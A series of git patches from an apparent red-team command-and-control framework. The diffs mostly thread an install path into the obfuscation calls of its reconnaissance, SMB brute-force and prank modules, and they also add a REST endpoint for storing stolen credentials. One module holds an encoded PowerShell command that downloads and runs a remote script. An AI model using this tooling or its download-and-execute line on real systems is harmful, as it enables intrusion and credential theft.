\"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py index 463840f..e39406c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py @@ -85,5 +85,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py index 0a98d22..8f2dd50 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py index 0168052..c32c615 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py index b521180..94d2fc1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py @@ -132,5 +132,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py index f527abf..9440c57 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py index d709597..fde07a3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py index 4a6d5cf..0fd2bb6 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py @@ -119,5 +119,5 @@ class Module: else: script += moduleName + " " + pscript + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed! Use ExpandObject option to expand one of the objects above such as \'System Access\'"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py index 4b7189f..c90d258 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py index 49c34ae..0e49bdc4 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py index 4ed84c1..5b713e5 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py index 7c55217..0a0592f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py index 28dd8ee..d4b2f82 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py index 1932b95..52ba4bc 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py @@ -109,5 +109,5 @@ class Module: script += '} | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py index f21e51f..6157e14 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py index 398e948..bf4e24f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py index 0fc757f..6e79356 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py @@ -108,5 +108,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py index 3422d5d..c9744d1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py index 2acb7aa..ab03fc8 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py @@ -133,5 +133,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py index 15a4e90..1fc5981 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py index ce408c8..8593fdd 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py @@ -88,5 +88,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py index feea3fb..db906f7 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py @@ -87,5 +87,5 @@ class Module: script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py index e2889bc..374e0e9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py index cfef751..e249a34 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py index 4ac729b..26b830c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py index 764fc63..6bc3df3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py @@ -92,5 +92,5 @@ class Module: script += '| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py index 3120886..055c482 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py @@ -147,5 +147,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py index 3c6379e..dfcd952 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py @@ -124,5 +124,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py index ba45584..3589dac 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py @@ -122,5 +122,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py index 05631cd..a1d2d15 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py @@ -158,5 +158,5 @@ class Module: script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/reverse_dns.py b/lib/modules/powershell/situational_awareness/network/reverse_dns.py index 26e3069..287c4eb 100644 --- a/lib/modules/powershell/situational_awareness/network/reverse_dns.py +++ b/lib/modules/powershell/situational_awareness/network/reverse_dns.py @@ -92,6 +92,6 @@ class Module: # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbautobrute.py b/lib/modules/powershell/situational_awareness/network/smbautobrute.py index 8da9d7f..a8765fa 100644 --- a/lib/modules/powershell/situational_awareness/network/smbautobrute.py +++ b/lib/modules/powershell/situational_awareness/network/smbautobrute.py @@ -130,6 +130,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/smbscanner.py b/lib/modules/powershell/situational_awareness/network/smbscanner.py index b784693..c5c133d 100644 --- a/lib/modules/powershell/situational_awareness/network/smbscanner.py +++ b/lib/modules/powershell/situational_awareness/network/smbscanner.py @@ -133,6 +133,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Invoke-SMBScanner completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py index 90abefb..6f358e1 100644 --- a/lib/modules/powershell/trollsploit/get_schwifty.py +++ b/lib/modules/powershell/trollsploit/get_schwifty.py @@ -99,5 +99,5 @@ Function Get-Schwifty script += "; 'Agent is getting schwifty!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/message.py b/lib/modules/powershell/trollsploit/message.py index 78c31be..76b0635 100644 --- a/lib/modules/powershell/trollsploit/message.py +++ b/lib/modules/powershell/trollsploit/message.py @@ -95,5 +95,5 @@ Invoke-Message""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/process_killer.py b/lib/modules/powershell/trollsploit/process_killer.py index 25ab191..89506f4 100644 --- a/lib/modules/powershell/trollsploit/process_killer.py +++ b/lib/modules/powershell/trollsploit/process_killer.py @@ -110,5 +110,5 @@ Invoke-ProcessKiller""" script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_ascii.py b/lib/modules/powershell/trollsploit/rick_ascii.py index 9cbdef0..774d580 100644 --- a/lib/modules/powershell/trollsploit/rick_ascii.py +++ b/lib/modules/powershell/trollsploit/rick_ascii.py @@ -55,5 +55,5 @@ class Module: # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w") script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/rick_astley.py b/lib/modules/powershell/trollsploit/rick_astley.py index 733aa87..6e19f56 100644 --- a/lib/modules/powershell/trollsploit/rick_astley.py +++ b/lib/modules/powershell/trollsploit/rick_astley.py @@ -72,6 +72,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/trollsploit/thunderstruck.py b/lib/modules/powershell/trollsploit/thunderstruck.py index 041b259..00b426e 100644 --- a/lib/modules/powershell/trollsploit/thunderstruck.py +++ b/lib/modules/powershell/trollsploit/thunderstruck.py @@ -99,5 +99,5 @@ Function Invoke-Thunderstruck script += "; 'Agent Thunderstruck.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/voicetroll.py b/lib/modules/powershell/trollsploit/voicetroll.py index 2d0eb80..1e7e021 100644 --- a/lib/modules/powershell/trollsploit/voicetroll.py +++ b/lib/modules/powershell/trollsploit/voicetroll.py @@ -85,5 +85,5 @@ Invoke-VoiceTroll""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wallpaper.py b/lib/modules/powershell/trollsploit/wallpaper.py index cdb21c5..d970f24 100644 --- a/lib/modules/powershell/trollsploit/wallpaper.py +++ b/lib/modules/powershell/trollsploit/wallpaper.py @@ -143,5 +143,5 @@ namespace Wallpaper script += "; 'Set-Wallpaper executed'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py index 62d76a9..f647c6d 100644 --- a/lib/modules/powershell/trollsploit/wlmdr.py +++ b/lib/modules/powershell/trollsploit/wlmdr.py @@ -108,5 +108,5 @@ Invoke-Wlrmdr""" else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script From 0f1bbc2ac83b314b836e620cb87ae151d5c46bf2 Mon Sep 17 00:00:00 2001 From: Dakota Nelson Date: Sat, 21 Oct 2017 20:40:55 +0100 Subject: [PATCH 28/50] Add REST endpoint to allow adding creds to DB via POST request --- empire | 59 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 57 insertions(+), 2 deletions(-) diff --git a/empire b/empire index 79e6759..5cbfc42 100755 --- a/empire +++ b/empire @@ -10,8 +10,7 @@ from Crypto.Random import random import ssl # Empire imports -from lib.common import empire -from lib.common import helpers +from lib.common import empire, helpers global serverExitCommand serverExitCommand = 'restart' @@ -134,6 +133,7 @@ def get_permanent_token(conn): # GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted # # GET http://localhost:1337/api/creds return stored credentials +# POST http://localhost:1337/api/creds add creds to the database # # GET http://localhost:1337/api/admin/login retrieve the API token given the correct username and password # GET http://localhost:1337/api/admin/permanenttoken retrieve the permanent API token, generating/storing one if it doesn't already exist @@ -1039,6 +1039,61 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, return jsonify({'creds' : creds}) + @app.route('/api/creds', methods=['POST']) + def add_creds(): + """ + Adds credentials to the database + """ + if not request.json or not 'credentials' in request.json: + abort(400) + + creds = request.json['credentials'] + + required_fields = ["credtype", "domain", "username", "password", "host"] + optional_fields = ["OS", "notes", "sid"] + + for cred in creds: + # ensure every credential given to us has all the required fields + if not all (k in cred for k in required_fields): + return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400) + + # ensure the type is either "hash" or "plaintext" + if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'): + return make_response(jsonify({'error':'invalid credential type in %s, must be "hash" or "plaintext"' %(cred)}), 400) + + # other than that... just assume everything is valid + + # this would be way faster if batched but will work for now + for cred in creds: + # get the optional stuff, if it's there + try: + os = cred['os'] + except KeyError: + os = '' + + try: + sid = cred['sid'] + except KeyError: + sid = '' + + try: + notes = cred['notes'] + except KeyError: + notes = '' + + main.credentials.add_credential( + cred['credtype'], + cred['domain'], + cred['username'], + cred['password'], + cred['host'], + os, + sid, + notes + ) + + return jsonify({'success': '%s credentials added' % len(creds)}) + @app.route('/api/reporting', methods=['GET']) def get_reporting(): From f629eb3e08c0befd6b3a14d48c262dcce691794f Mon Sep 17 00:00:00 2001 From: xorrior Date: Sun, 22 Oct 2017 17:18:51 -0400 Subject: [PATCH 29/50] Add missing slack token and slack channel options for dbx listener --- lib/listeners/dbx.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py index 1f91e3d..4f99a6b 100755 --- a/lib/listeners/dbx.py +++ b/lib/listeners/dbx.py @@ -111,6 +111,16 @@ class Listener: 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' + }, + 'SlackToken' : { + 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', + 'Required' : False, + 'Value' : '' + }, + 'SlackChannel' : { + 'Description' : 'The Slack channel or DM that notifications will be sent to.', + 'Required' : False, + 'Value' : '#general' } } From 95d8142b39d0cb701db398853ab9f3e8ca491ac1 Mon Sep 17 00:00:00 2001 From: xorrior Date: Mon, 23 Oct 2017 21:17:08 -0400 Subject: [PATCH 30/50] Remove debug message from xkeylogger module --- lib/modules/python/collection/linux/xkeylogger.py | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/modules/python/collection/linux/xkeylogger.py b/lib/modules/python/collection/linux/xkeylogger.py index 61f3437..090d23e 100644 --- a/lib/modules/python/collection/linux/xkeylogger.py +++ 